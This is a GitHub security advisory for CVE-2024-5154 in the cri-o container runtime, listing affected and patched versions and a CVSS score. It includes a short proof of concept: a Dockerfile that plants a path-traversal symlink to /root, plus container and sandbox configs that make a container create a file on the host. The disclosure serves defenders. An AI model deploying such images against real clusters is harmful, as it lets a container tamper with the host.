Skip to content

malicious container creates symlink "mtab" on the host External

High severity GitHub Reviewed Published Jun 3, 2024 in cri-o/cri-o • Updated Jun 27, 2024

Package

gomod github.com/cri-o/cri-o (Go)

Affected versions

= 1.30.0
= 1.29.4
= 1.28.6

Patched versions

1.30.1
1.29.5
1.28.7

Description

Impact

A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.

A workload built from this Dockerfile:

FROM docker.io/library/busybox as source
RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc

FROM scratch

COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra .

and this container config:

{
  "metadata": {
      "name": "busybox"
  },
  "image":{
      "image": "localhost/test"
  },
  "command": [
      "/bin/true"
  ],
  "linux": {
  }
}


and this sandbox config

{
  "metadata": {
    "name": "test-sandbox",
    "namespace": "default",
    "attempt": 1,
    "uid": "edishd83djaideaduwk28bcsb"
  },
  "linux": {
    "security_context": {
      "namespace_options": {
        "network": 2
      }
    }
  }
}

will create a file on host /host/mtab

Patches

1.30.1, 1.29.5, 1.28.7

Workarounds

Unfortunately not

References

Are there any links users can visit to find out more?

References

@haircommander haircommander published to cri-o/cri-o Jun 3, 2024
Published to the GitHub Advisory Database Jun 4, 2024
Reviewed Jun 4, 2024
Published by the National Vulnerability Database Jun 12, 2024
Last updated Jun 27, 2024

Severity

High
8.1
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

CVE ID

CVE-2024-5154

GHSA ID

GHSA-j9hf-98c3-wrm8

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.